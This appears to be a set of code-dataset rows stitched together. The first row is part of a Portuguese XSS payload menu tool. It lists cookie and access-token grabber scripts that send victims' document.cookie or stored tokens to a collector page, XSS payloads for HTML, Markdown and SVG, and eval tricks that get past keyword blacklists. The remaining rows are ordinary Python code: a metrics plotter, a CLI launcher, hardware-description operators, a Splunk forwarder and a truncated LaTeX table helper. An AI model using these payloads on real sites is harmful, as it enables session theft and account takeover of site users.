╦╔═╗╔╗╔╔═╗╦═╗╔═╗╦═╗ ╦ ╦╔═╗╔╦╗╔═╗ ╔╗╔╔═╗╔═╗╦═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╦ ╔═╗╦ ╦╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ ╔═╗╦ ╦╔═╗╦ ╦╔═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔╦╗╦╔═╗╔═╗
║║ ╦║║║║ ║╠╦╝╠═╣╠╦╝ ║ ║╚═╗ ║ ╠═╣ ║║║║╣ ║ ╦╠╦╝╠═╣ ║║║╣ ╠═╝╠═╣║ ╠═╣╚╗╔╝╠╦╝╠═╣╚═╗ ║ ║ ║║║║ ╠═╣╚╗╔╝╠═╣║ ║╠═╣║ ║ ║║║╣ ║ ║║║║ ╦║ ║
╩╚═╝╝╚╝╚═╝╩╚═╩ ╩╩╚═ ╩═╝╩╚═╝ ╩ ╩ ╩ ╝╚╝╚═╝╚═╝╩╚═╩ ╩ ═╩╝╚═╝ ╩ ╩ ╩╩═╝╩ ╩ ╚╝ ╩╚═╩ ╩╚═╝ ╚═╝╚═╝╩ ╩ ╩ ╩ ╚╝ ╩ ╩╩═╝╩╩ ╩╚═╝ ═╩╝╚═╝ ╚═╝═╩╝╩╚═╝╚═╝\n
> eval('ale'+'rt(0)');
> Function('ale'+'rt(1)')();
> new Function`alert`6``;
> setTimeout('ale'+'rt(2)');
> setInterval('ale'+'rt(10)');
> Set.constructor('ale'+'rt(13)')();
> Set.constructor`alert(14)```;
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '6':
break
elif cmd == '99':
print("Até logo...")
exit()
else:
print("Comando Inválido!!!")
sleep(2)
| pt | 0.264971 | # BIBLIOTESCAS # ============================= # ============================= # # # Funçao do XSS ═╗ ╦╔═╗╔═╗ ╔╩╦╝╚═╗╚═╗ ╩ ╚═╚═╝╚═╝\n - Os Ataques Cross-site Scripting (Xss) São Um Tipo De Injeção, Na Qual Scripts Maliciosos São Injetados Em Sites Benignos E Confiáveis. Os Ataques Xss Ocorrem Quando Um Invasor Usa Um Aplicativo Da Web Para Enviar Código Malicioso, Geralmente Na Forma De Um Script Do Lado Do Navegador, Para Um Usuário Final Diferente. As Falhas Que Permitem Que Esses Ataques Sejam Bem-sucedidos São Bastante Difundidas E Ocorrem Em Qualquer Lugar Em Que Um Aplicativo Da Web Usa A Entrada De Um Usuário Na Saída Que Gera Sem Validá-la Ou Codificá-la.\n [01] - Agarrador De Dados Para Xss [02] - Xss Em Html/aplicativos [03] - Xss Em Markdown [04] - Xss Em Svg(Curto) [05] - Ignorar Lista Negra De Palavras Com Avaliação De Código [06] - Menu [99] - Sair ╔═╗╔═╗╔═╗╦═╗╦═╗╔═╗╔╦╗╔═╗╦═╗ ╔╦╗╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔═╗ ╔═╗╔═╗╦═╗╔═╗ ═╗ ╦╔═╗╔═╗ ╠═╣║ ╦╠═╣╠╦╝╠╦╝╠═╣ ║║║ ║╠╦╝ ║║║╣ ║║╠═╣ ║║║ ║╚═╗ ╠═╝╠═╣╠╦╝╠═╣ ╔╩╦╝╚═╗╚═╗ ╩ ╩╚═╝╩ ╩╩╚═╩╚═╩ ╩═╩╝╚═╝╩╚═ ═╩╝╚═╝ ═╩╝╩ ╩═╩╝╚═╝╚═╝ ╩ ╩ ╩╩╚═╩ ╩ ╩ ╚═╚═╝╚═╝\n - Obtém O Cookie Do Administrador Ou Token De Acesso Confidencial, A Seguinte Carga O Enviará Para Uma Página Controlada. > <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script> > <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script> > <script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script> > <script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script> ═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╦ ╦╔╦╗╔╦╗╦ ╔═╗ ╔═╗╔═╗╦ ╦╔═╗╔═╗╔╦╗╦╦ ╦╔═╗╔═╗ ╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╠═╣ ║ ║║║║ ║╣ ╠═╣╠═╝║ ║║ ╠═╣ ║ ║╚╗╔╝║ ║╚═╗ ╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩ ╩ ╩ ╩╩═╝ ╚═╝ ╩ ╩╩ ╩═╝╩╚═╝╩ ╩ ╩ ╩ ╚╝ ╚═╝╚═╝ \n > <script>alert('XSS')</script> > <scr<script>ipt>alert('XSS')</scr<script>ipt> > "><script>alert("XSS")</script> > "><script>alert(String.fromCharCode(88,83,83))</script> > <img src=x onerror=alert('XSS');> > <img src=x onerror=alert('XSS')// > <img src=x onerror=alert(String.fromCharCode(88,83,83));> > <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> > <img src=x:alert(alt) onerror=eval(src) alt=xss> > "><img src=x onerror=alert("XSS");> > "><img src=x onerror=alert(String.fromCharCode(88,83,83));> ═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔╦╗╔═╗╦═╗╦╔═╔╦╗╔═╗╦ ╦╔╗╔ ╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ║║║╠═╣╠╦╝╠╩╗ ║║║ ║║║║║║║ ╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩╩ ╩╩╚═╩ ╩═╩╝╚═╝╚╩╝╝╚╝ \n > [a](javascript:prompt(document.cookie)) > [a](j a v a s c r i p t:prompt(document.cookie)) > [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) > [a](javascript:window.onerror=alert;throw%201) ═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔═╗╦ ╦╔═╗ ╔═╗╦ ╦╦═╗╔╦╗╔═╗ ╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╚═╗╚╗╔╝║ ╦ ║ ║ ║╠╦╝ ║ ║ ║ ╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╚═╝ ╚╝ ╚═╝ ╚═╝╚═╝╩╚═ ╩ ╚═╝\n > <svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/> > <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> > <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> > <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> ╦╔═╗╔╗╔╔═╗╦═╗╔═╗╦═╗ ╦ ╦╔═╗╔╦╗╔═╗ ╔╗╔╔═╗╔═╗╦═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╦ ╔═╗╦ ╦╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ ╔═╗╦ ╦╔═╗╦ ╦╔═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔╦╗╦╔═╗╔═╗ ║║ ╦║║║║ ║╠╦╝╠═╣╠╦╝ ║ ║╚═╗ ║ ╠═╣ ║║║║╣ ║ ╦╠╦╝╠═╣ ║║║╣ ╠═╝╠═╣║ ╠═╣╚╗╔╝╠╦╝╠═╣╚═╗ ║ ║ ║║║║ ╠═╣╚╗╔╝╠═╣║ ║╠═╣║ ║ ║║║╣ ║ ║║║║ ╦║ ║ ╩╚═╝╝╚╝╚═╝╩╚═╩ ╩╩╚═ ╩═╝╩╚═╝ ╩ ╩ ╩ ╝╚╝╚═╝╚═╝╩╚═╩ ╩ ═╩╝╚═╝ ╩ ╩ ╩╩═╝╩ ╩ ╚╝ ╩╚═╩ ╩╚═╝ ╚═╝╚═╝╩ ╩ ╩ ╩ ╚╝ ╩ ╩╩═╝╩╩ ╩╚═╝ ═╩╝╚═╝ ╚═╝═╩╝╩╚═╝╚═╝\n > eval('ale'+'rt(0)'); > Function('ale'+'rt(1)')(); > new Function`alert`6``; > setTimeout('ale'+'rt(2)'); > setInterval('ale'+'rt(10)'); > Set.constructor('ale'+'rt(13)')(); > Set.constructor`alert(14)```; | 3.370845 | 3 |
gamechangerml/src/search/evaluation/plotter.py | ekmixon/gamechanger-ml | 11 | 6623941 | <reponame>ekmixon/gamechanger-ml
import os
import json
import matplotlib.pyplot as plt
import logging
import argparse
logger = logging.getLogger(__name__)
def load_json(path):
"""
Load json file
Args:
path (str): Path to JSON file
Returns:
data (dict): Dictionary form of JSON file
"""
with open(path, "r") as fp:
data = json.load(fp)
return data
def load_all_metrics(data_path):
"""
Load all `metrics.json` files in a directory.
Args:
data_path (str): Path of folder directory containing all tests
Returns:
all_data (dict): Dictionary form containing all data of all metrics
"""
all_data = {}
for root, dirs, files in os.walk(data_path, topdown=True):
for name in files:
if name == "metrics.json":
file_path = os.path.join(root, name)
model_name = root.split("/")[-1]
all_data[model_name] = load_json(file_path)
return all_data
def generate_report(all_data, fname, metric):
"""
Generate a report from all_data given a
specific metric
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
metric (str): Metric name to evaluate in the metrics file
"""
plt.figure(figsize=(8, 6))
for model_name, data in all_data.items():
k_s = []
score = []
for key, value in data.items():
k_s.append(key)
score.append(value[metric])
plt.plot(k_s, score, label=model_name, marker=".")
plt.ylabel(metric.title())
plt.xlabel("k")
plt.title(f"{metric.title()} Scores")
plt.ylim((0.0, 1.0))
plt.grid()
plt.legend()
plt.savefig(fname)
def generate_mrr(all_data, fname):
"""
Generate an MRR report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8, 4))
models = []
scores = []
for model_name, data in sorted(all_data.items(), reverse = True):
models.append(model_name)
scores.append(data["10"]["mrr_at_k"])
plt.title("MRR Scores at k=10")
plt.xlim((0.0, 1.0))
plt.barh(range(len(scores)), scores)
plt.yticks(range(len(models)), models)
for model_name, score in zip(models, scores):
plt.annotate(round(score, 3), (score, models.index(model_name)-0.2))
plt.tight_layout()
plt.savefig(fname)
def generate_precision_recall(all_data, fname):
"""
Generate an precision and recall report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8,6))
models = []
precision_list = []
recall_list = []
for model_name, data in all_data.items():
models.append(model_name)
precision = []
recall = []
for key, value in data.items():
precision.append(value['precision'])
recall.append(value['recall'])
precision_list.append(precision)
recall_list.append(recall)
plt.plot(precision, recall, label = model_name)
plt.ylim(0, 1)
plt.xlim(0, 1)
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.legend()
plt.grid()
plt.tight_layout()
plt.savefig(fname)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-e",
"--eval_path",
dest="evaluation_path",
required=True,
type=str,
help="Folder path to model predictions that have been evaluated",
)
args = parser.parse_args()
path = args.evaluation_path
all_data = load_all_metrics(path)
fname = f"{path}/precision.png"
generate_report(all_data, fname, "precision")
fname = f"{path}/recall.png"
generate_report(all_data, fname, "recall")
fname = f"{path}/mrr_line.png"
generate_report(all_data, fname, "mrr_at_k")
fname = f"{path}/mrr.png"
generate_mrr(all_data, fname)
fname = f"{path}/precision_recall.png"
generate_precision_recall(all_data, fname)
| import os
import json
import matplotlib.pyplot as plt
import logging
import argparse
logger = logging.getLogger(__name__)
def load_json(path):
"""
Load json file
Args:
path (str): Path to JSON file
Returns:
data (dict): Dictionary form of JSON file
"""
with open(path, "r") as fp:
data = json.load(fp)
return data
def load_all_metrics(data_path):
"""
Load all `metrics.json` files in a directory.
Args:
data_path (str): Path of folder directory containing all tests
Returns:
all_data (dict): Dictionary form containing all data of all metrics
"""
all_data = {}
for root, dirs, files in os.walk(data_path, topdown=True):
for name in files:
if name == "metrics.json":
file_path = os.path.join(root, name)
model_name = root.split("/")[-1]
all_data[model_name] = load_json(file_path)
return all_data
def generate_report(all_data, fname, metric):
"""
Generate a report from all_data given a
specific metric
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
metric (str): Metric name to evaluate in the metrics file
"""
plt.figure(figsize=(8, 6))
for model_name, data in all_data.items():
k_s = []
score = []
for key, value in data.items():
k_s.append(key)
score.append(value[metric])
plt.plot(k_s, score, label=model_name, marker=".")
plt.ylabel(metric.title())
plt.xlabel("k")
plt.title(f"{metric.title()} Scores")
plt.ylim((0.0, 1.0))
plt.grid()
plt.legend()
plt.savefig(fname)
def generate_mrr(all_data, fname):
"""
Generate an MRR report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8, 4))
models = []
scores = []
for model_name, data in sorted(all_data.items(), reverse = True):
models.append(model_name)
scores.append(data["10"]["mrr_at_k"])
plt.title("MRR Scores at k=10")
plt.xlim((0.0, 1.0))
plt.barh(range(len(scores)), scores)
plt.yticks(range(len(models)), models)
for model_name, score in zip(models, scores):
plt.annotate(round(score, 3), (score, models.index(model_name)-0.2))
plt.tight_layout()
plt.savefig(fname)
def generate_precision_recall(all_data, fname):
"""
Generate an precision and recall report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8,6))
models = []
precision_list = []
recall_list = []
for model_name, data in all_data.items():
models.append(model_name)
precision = []
recall = []
for key, value in data.items():
precision.append(value['precision'])
recall.append(value['recall'])
precision_list.append(precision)
recall_list.append(recall)
plt.plot(precision, recall, label = model_name)
plt.ylim(0, 1)
plt.xlim(0, 1)
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.legend()
plt.grid()
plt.tight_layout()
plt.savefig(fname)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-e",
"--eval_path",
dest="evaluation_path",
required=True,
type=str,
help="Folder path to model predictions that have been evaluated",
)
args = parser.parse_args()
path = args.evaluation_path
all_data = load_all_metrics(path)
fname = f"{path}/precision.png"
generate_report(all_data, fname, "precision")
fname = f"{path}/recall.png"
generate_report(all_data, fname, "recall")
fname = f"{path}/mrr_line.png"
generate_report(all_data, fname, "mrr_at_k")
fname = f"{path}/mrr.png"
generate_mrr(all_data, fname)
fname = f"{path}/precision_recall.png"
generate_precision_recall(all_data, fname) | en | 0.678856 | Load json file Args: path (str): Path to JSON file Returns: data (dict): Dictionary form of JSON file Load all `metrics.json` files in a directory. Args: data_path (str): Path of folder directory containing all tests Returns: all_data (dict): Dictionary form containing all data of all metrics Generate a report from all_data given a specific metric Args: all_data (dict): Dictionary of all metrics from a directory containing all of the tests fname (str): Filename to save the report graph metric (str): Metric name to evaluate in the metrics file Generate an MRR report from all_data Args: all_data (dict): Dictionary of all metrics from a directory containing all of the tests fname (str): Filename to save the report graph Generate an precision and recall report from all_data Args: all_data (dict): Dictionary of all metrics from a directory containing all of the tests fname (str): Filename to save the report graph | 3.036254 | 3 |
aqopa/cmd.py | lukaszkurantdev/AQoPA | 2 | 6623942 | '''
Created on 30-10-2013
@author: damian
'''
import optparse
import sys
import os
from aqopa import VERSION
from aqopa.bin import console, gui
def gui_command():
app = gui.AqopaApp(False)
app.MainLoop()
def console_command():
parser = optparse.OptionParser()
parser.usage = "%prog [options]"
parser.add_option("-f", "--model-file", dest="model_file", metavar="FILE",
help="specifies model file")
parser.add_option("-m", "--metrics-file", dest="metrics_file", metavar="FILE",
help="specifies file with metrics")
parser.add_option("-c", "--config-file", dest="config_file", metavar="FILE",
help="specifies file with modules configuration")
parser.add_option("-s", "--states", dest="save_states", action="store_true", default=False,
help="save states flow in a file")
parser.add_option("-p", '--progressbar', dest="show_progressbar", action="store_true", default=False,
help="show the progressbar of the simulation")
parser.add_option("-V", '--version', dest="show_version", action="store_true", default=False,
help="show version of AQoPA")
parser.add_option("-d", "--debug", dest="debug", action="store_true", default=False,
help="DEBUG mode")
(options, args) = parser.parse_args()
if options.show_version:
print "AQoPA (version %s)" % VERSION
sys.exit(0)
if not options.model_file:
parser.error("no qopml model file specified")
if not os.path.exists(options.model_file):
parser.error("qopml model file '%s' does not exist" % options.model_file)
if not options.metrics_file:
parser.error("no metrics file specified")
if not os.path.exists(options.metrics_file):
parser.error("metrics file '%s' does not exist" % options.metrics_file)
if not options.config_file:
parser.error("no configuration file specified")
if not os.path.exists(options.config_file):
parser.error("configuration file '%s' does not exist" % options.config_file)
f = open(options.model_file, 'r')
qopml_model = f.read()
f.close()
f = open(options.metrics_file, 'r')
qopml_metrics = f.read()
f.close()
f = open(options.config_file, 'r')
qopml_config = f.read()
f.close()
console.run(qopml_model, qopml_metrics, qopml_config,
save_states=options.save_states, debug=options.debug,
show_progressbar=options.show_progressbar)
| '''
Created on 30-10-2013
@author: damian
'''
import optparse
import sys
import os
from aqopa import VERSION
from aqopa.bin import console, gui
def gui_command():
app = gui.AqopaApp(False)
app.MainLoop()
def console_command():
parser = optparse.OptionParser()
parser.usage = "%prog [options]"
parser.add_option("-f", "--model-file", dest="model_file", metavar="FILE",
help="specifies model file")
parser.add_option("-m", "--metrics-file", dest="metrics_file", metavar="FILE",
help="specifies file with metrics")
parser.add_option("-c", "--config-file", dest="config_file", metavar="FILE",
help="specifies file with modules configuration")
parser.add_option("-s", "--states", dest="save_states", action="store_true", default=False,
help="save states flow in a file")
parser.add_option("-p", '--progressbar', dest="show_progressbar", action="store_true", default=False,
help="show the progressbar of the simulation")
parser.add_option("-V", '--version', dest="show_version", action="store_true", default=False,
help="show version of AQoPA")
parser.add_option("-d", "--debug", dest="debug", action="store_true", default=False,
help="DEBUG mode")
(options, args) = parser.parse_args()
if options.show_version:
print "AQoPA (version %s)" % VERSION
sys.exit(0)
if not options.model_file:
parser.error("no qopml model file specified")
if not os.path.exists(options.model_file):
parser.error("qopml model file '%s' does not exist" % options.model_file)
if not options.metrics_file:
parser.error("no metrics file specified")
if not os.path.exists(options.metrics_file):
parser.error("metrics file '%s' does not exist" % options.metrics_file)
if not options.config_file:
parser.error("no configuration file specified")
if not os.path.exists(options.config_file):
parser.error("configuration file '%s' does not exist" % options.config_file)
f = open(options.model_file, 'r')
qopml_model = f.read()
f.close()
f = open(options.metrics_file, 'r')
qopml_metrics = f.read()
f.close()
f = open(options.config_file, 'r')
qopml_config = f.read()
f.close()
console.run(qopml_model, qopml_metrics, qopml_config,
save_states=options.save_states, debug=options.debug,
show_progressbar=options.show_progressbar)
| en | 0.580341 | Created on 30-10-2013 @author: damian | 2.240026 | 2 |
tests/test_example.py | norwood867/trio-gpio | 0 | 6623943 | async def test_basic(foo):
assert foo == "bar"
| async def test_basic(foo):
assert foo == "bar"
| none | 1 | 1.327144 | 1 | |
frappe/__version__.py | indictranstech/Hospital-frappe | 0 | 6623944 | from __future__ import unicode_literals
__version__ = "6.27.18"
| from __future__ import unicode_literals
__version__ = "6.27.18"
| none | 1 | 1.056297 | 1 | |
amethyst/support/ops.py | medav/amethyst | 0 | 6623945 | from atlas import *
class BitOrReduceOperator(Operator):
"""Operator that reduces a bits signal via logic OR."""
#
# N.B. This is a good example of how extendable Atlas/Python is. It enables
# user code to create new synthesizable operations that generate custom
# Verilog code.
#
# Since Atlas doesn't currently have a good way of producing an OR reduction
# tree, we can just make our own, here!
#
def __init__(self, bits):
super().__init__('reduce_or')
self.bit_vec = [FilterFrontend(bits(i, i)) for i in range(bits.width)]
self.result = CreateSignal(
Bits(1),
name='result',
parent=self,
frontend=False)
def Declare(self):
VDeclWire(self.result)
def Synthesize(self):
add_str = ' | '.join([VName(bit) for bit in self.bit_vec])
VAssignRaw(VName(self.result), add_str)
@OpGen(default='result')
def BitOrReduce(bits):
return BitOrReduceOperator(bits)
class ValidSetOperator(Operator):
"""Operator that manages a bit array for valid flags.
N.B. Reads are not clocked (I.e. done combinationally).
"""
def __init__(self, width : int, clock=None, reset=None):
super().__init__('validset')
self.width = width
self.addrwidth = Log2Ceil(self.width)
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
if reset is None:
self.reset = DefaultReset()
else:
self.reset = reset
self.read_ports = []
self.write_ports = []
def Get(self, addr_signal):
read_signal = CreateSignal(
Bits(1),
name=f'read_{len(self.read_ports)}',
parent=self,
frontend=False)
self.read_ports.append((FilterFrontend(addr_signal), read_signal))
return WrapSignal(read_signal)
def __getitem__(self, key):
return self.Get(key)
def Set(self, addr_signal, data_signal, enable_signal):
assert enable_signal.width == 1
assert (type(data_signal) is bool) or \
(type(data_signal) is int) or \
(data_signal.width == 1)
self.write_ports.append((
FilterFrontend(addr_signal),
FilterFrontend(data_signal),
FilterFrontend(enable_signal)))
def Declare(self):
for (addr, data) in self.read_ports:
VDeclWire(data)
def Synthesize(self):
set_name = self.name
VEmitRaw(
f'reg {set_name} [{self.width - 1} : 0];')
for (addr, data) in self.read_ports:
VAssignRaw(VName(data), f'{set_name}[{VName(addr)}]')
with VAlways([VPosedge(self.clock)]):
with VIf(self.reset):
VConnectRaw(f'{set_name}', '\'{default:0};')
with VElse():
for (addr, data, enable) in self.write_ports:
with VIf(enable):
VConnectRaw(f'{set_name}[{VName(addr)}]', VName(data))
@OpGen(cacheable=False)
def ValidSet(width : int):
return ValidSetOperator(width)
class DisplayOperator(Operator):
def __init__(self, args : list, clock=None, en=None):
super().__init__('clocked_display')
self.args = args
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
self.en = en
def Declare(self):
pass
def Synthesize(self):
def ProcessArg(arg):
if type(arg) is str:
return f'"{arg}"'
else:
return VName(FilterFrontend(arg))
args_str = ', '.join(map(ProcessArg, self.args))
with VAlways([VPosedge(self.clock)]):
if self.en is None:
VEmitRaw(f'$display({args_str});')
else:
with VIf(FilterFrontend(self.en)):
VEmitRaw(f'$display({args_str});')
@OpGen(cacheable=False)
def Display(args : list, clock=None, en=None):
return DisplayOperator(args, clock=clock, en=en)
class ProbeOperator(Operator):
"""Operator that produces a verilog signal for probing.
The resulting signal will be marked as verilator public
"""
def __init__(self, bits, probe_name=None):
super().__init__(override_name='probe')
self.bits = FilterFrontend(bits)
self.probe_name = probe_name
self.probe = CreateSignal(
bits.meta.typespec,
name=None,
parent=self,
frontend=False)
def Declare(self):
if self.probe_name is not None:
self.probe.meta.name = self.probe_name
else:
self.probe.meta.name = self.bits.meta.name
width_str = \
f'[{self.probe.width - 1} : 0]' if self.probe.width > 1 else ''
VEmitRaw(
f'wire {width_str} {VName(self.probe)} /* verilator public */;')
def Synthesize(self):
VAssign(self.probe, self.bits)
@OpGen(cacheable=False)
def Probe(bits, name=None):
return ProbeOperator(bits, probe_name=name)
| from atlas import *
class BitOrReduceOperator(Operator):
"""Operator that reduces a bits signal via logic OR."""
#
# N.B. This is a good example of how extendable Atlas/Python is. It enables
# user code to create new synthesizable operations that generate custom
# Verilog code.
#
# Since Atlas doesn't currently have a good way of producing an OR reduction
# tree, we can just make our own, here!
#
def __init__(self, bits):
super().__init__('reduce_or')
self.bit_vec = [FilterFrontend(bits(i, i)) for i in range(bits.width)]
self.result = CreateSignal(
Bits(1),
name='result',
parent=self,
frontend=False)
def Declare(self):
VDeclWire(self.result)
def Synthesize(self):
add_str = ' | '.join([VName(bit) for bit in self.bit_vec])
VAssignRaw(VName(self.result), add_str)
@OpGen(default='result')
def BitOrReduce(bits):
return BitOrReduceOperator(bits)
class ValidSetOperator(Operator):
"""Operator that manages a bit array for valid flags.
N.B. Reads are not clocked (I.e. done combinationally).
"""
def __init__(self, width : int, clock=None, reset=None):
super().__init__('validset')
self.width = width
self.addrwidth = Log2Ceil(self.width)
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
if reset is None:
self.reset = DefaultReset()
else:
self.reset = reset
self.read_ports = []
self.write_ports = []
def Get(self, addr_signal):
read_signal = CreateSignal(
Bits(1),
name=f'read_{len(self.read_ports)}',
parent=self,
frontend=False)
self.read_ports.append((FilterFrontend(addr_signal), read_signal))
return WrapSignal(read_signal)
def __getitem__(self, key):
return self.Get(key)
def Set(self, addr_signal, data_signal, enable_signal):
assert enable_signal.width == 1
assert (type(data_signal) is bool) or \
(type(data_signal) is int) or \
(data_signal.width == 1)
self.write_ports.append((
FilterFrontend(addr_signal),
FilterFrontend(data_signal),
FilterFrontend(enable_signal)))
def Declare(self):
for (addr, data) in self.read_ports:
VDeclWire(data)
def Synthesize(self):
set_name = self.name
VEmitRaw(
f'reg {set_name} [{self.width - 1} : 0];')
for (addr, data) in self.read_ports:
VAssignRaw(VName(data), f'{set_name}[{VName(addr)}]')
with VAlways([VPosedge(self.clock)]):
with VIf(self.reset):
VConnectRaw(f'{set_name}', '\'{default:0};')
with VElse():
for (addr, data, enable) in self.write_ports:
with VIf(enable):
VConnectRaw(f'{set_name}[{VName(addr)}]', VName(data))
@OpGen(cacheable=False)
def ValidSet(width : int):
return ValidSetOperator(width)
class DisplayOperator(Operator):
def __init__(self, args : list, clock=None, en=None):
super().__init__('clocked_display')
self.args = args
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
self.en = en
def Declare(self):
pass
def Synthesize(self):
def ProcessArg(arg):
if type(arg) is str:
return f'"{arg}"'
else:
return VName(FilterFrontend(arg))
args_str = ', '.join(map(ProcessArg, self.args))
with VAlways([VPosedge(self.clock)]):
if self.en is None:
VEmitRaw(f'$display({args_str});')
else:
with VIf(FilterFrontend(self.en)):
VEmitRaw(f'$display({args_str});')
@OpGen(cacheable=False)
def Display(args : list, clock=None, en=None):
return DisplayOperator(args, clock=clock, en=en)
class ProbeOperator(Operator):
"""Operator that produces a verilog signal for probing.
The resulting signal will be marked as verilator public
"""
def __init__(self, bits, probe_name=None):
super().__init__(override_name='probe')
self.bits = FilterFrontend(bits)
self.probe_name = probe_name
self.probe = CreateSignal(
bits.meta.typespec,
name=None,
parent=self,
frontend=False)
def Declare(self):
if self.probe_name is not None:
self.probe.meta.name = self.probe_name
else:
self.probe.meta.name = self.bits.meta.name
width_str = \
f'[{self.probe.width - 1} : 0]' if self.probe.width > 1 else ''
VEmitRaw(
f'wire {width_str} {VName(self.probe)} /* verilator public */;')
def Synthesize(self):
VAssign(self.probe, self.bits)
@OpGen(cacheable=False)
def Probe(bits, name=None):
return ProbeOperator(bits, probe_name=name)
| en | 0.87989 | Operator that reduces a bits signal via logic OR. # # N.B. This is a good example of how extendable Atlas/Python is. It enables # user code to create new synthesizable operations that generate custom # Verilog code. # # Since Atlas doesn't currently have a good way of producing an OR reduction # tree, we can just make our own, here! # Operator that manages a bit array for valid flags.
N.B. Reads are not clocked (I.e. done combinationally). Operator that produces a verilog signal for probing.
The resulting signal will be marked as verilator public | 3.101837 | 3 |
splunkforwarder.py | iamnavpreet/httpsplunkforwarder | 0 | 6623946 | import json
import requests
class SplunkForwarder:
def __init__(self, authorization_token, splunk_ingester_domain, connection_port='443'):
assert 'http' in splunk_ingester_domain
assert authorization_token
self.token = authorization_token
self.ingester_url = "{}:{}{}".format(splunk_ingester_domain, connection_port, "/services/collector/event")
self.port = connection_port
def build_metadata(self, index_name=None, **other_metadata):
metadata = dict()
if index_name:
metadata["index"] = index_name
if other_metadata:
metadata.update(other_metadata)
def send(self):
headers = dict()
headers['Authorization'] = 'Splunk {}'.format(self.token)
if hasattr(self, "payload") and self.payload:
response = requests.post(self.ingester_url, data=self.payload, headers=headers)
if response.status_code != 200:
print("Issues in sending to splunk - URL -> {}".format(self.ingester_url))
def build_payload(self, events, metadata):
if isinstance(events, list):
concatenated_payload = ""
for event in events:
payload = dict()
payload["host"] = self.ingester_url
payload["event"] = event
if metadata:
payload.update(metadata)
concatenated_payload += json.dumps(payload)
if concatenated_payload:
setattr(self, "payload", concatenated_payload)
# r = requests.post(self.ingester_url?, data=concatenated_payload, headers=headers)
else:
payload = dict()
payload["host"] = self.ingester_url
payload["event"] = events
if metadata:
payload.update(metadata)
setattr(self, "payload", json.dumps(payload))
| import json
import requests
class SplunkForwarder:
def __init__(self, authorization_token, splunk_ingester_domain, connection_port='443'):
assert 'http' in splunk_ingester_domain
assert authorization_token
self.token = authorization_token
self.ingester_url = "{}:{}{}".format(splunk_ingester_domain, connection_port, "/services/collector/event")
self.port = connection_port
def build_metadata(self, index_name=None, **other_metadata):
metadata = dict()
if index_name:
metadata["index"] = index_name
if other_metadata:
metadata.update(other_metadata)
def send(self):
headers = dict()
headers['Authorization'] = 'Splunk {}'.format(self.token)
if hasattr(self, "payload") and self.payload:
response = requests.post(self.ingester_url, data=self.payload, headers=headers)
if response.status_code != 200:
print("Issues in sending to splunk - URL -> {}".format(self.ingester_url))
def build_payload(self, events, metadata):
if isinstance(events, list):
concatenated_payload = ""
for event in events:
payload = dict()
payload["host"] = self.ingester_url
payload["event"] = event
if metadata:
payload.update(metadata)
concatenated_payload += json.dumps(payload)
if concatenated_payload:
setattr(self, "payload", concatenated_payload)
# r = requests.post(self.ingester_url?, data=concatenated_payload, headers=headers)
else:
payload = dict()
payload["host"] = self.ingester_url
payload["event"] = events
if metadata:
payload.update(metadata)
setattr(self, "payload", json.dumps(payload))
| en | 0.486251 | # r = requests.post(self.ingester_url?, data=concatenated_payload, headers=headers) | 2.55287 | 3 |
xlstotex/utils.py | tjkessler/xlstotex | 0 | 6623947 | <gh_stars>0
from csv import DictReader
def construct_header(line: list) -> list:
keys = list(line.keys())
header = r'\hline \\[-3.6 ex] '
for idx, key in enumerate(keys):
header += key
if idx != len(keys) - 1:
header += ' & '
return header + r' \\' + r' [0.2 ex] \hline \\ [-3 ex]'
def construct_table(header: str, lines: list, col_widths: tuple) -> str:
table = r'\begin{tabular}{'
for idx, width in enumerate(col_widths):
table += r'p{' + str(width) + 'px}'
if idx != len(col_widths) - 1:
table += r' '
table += r'}' + '\n'
table += ' ' + header + '\n'
for line in lines:
table += r' ' + line + '\n'
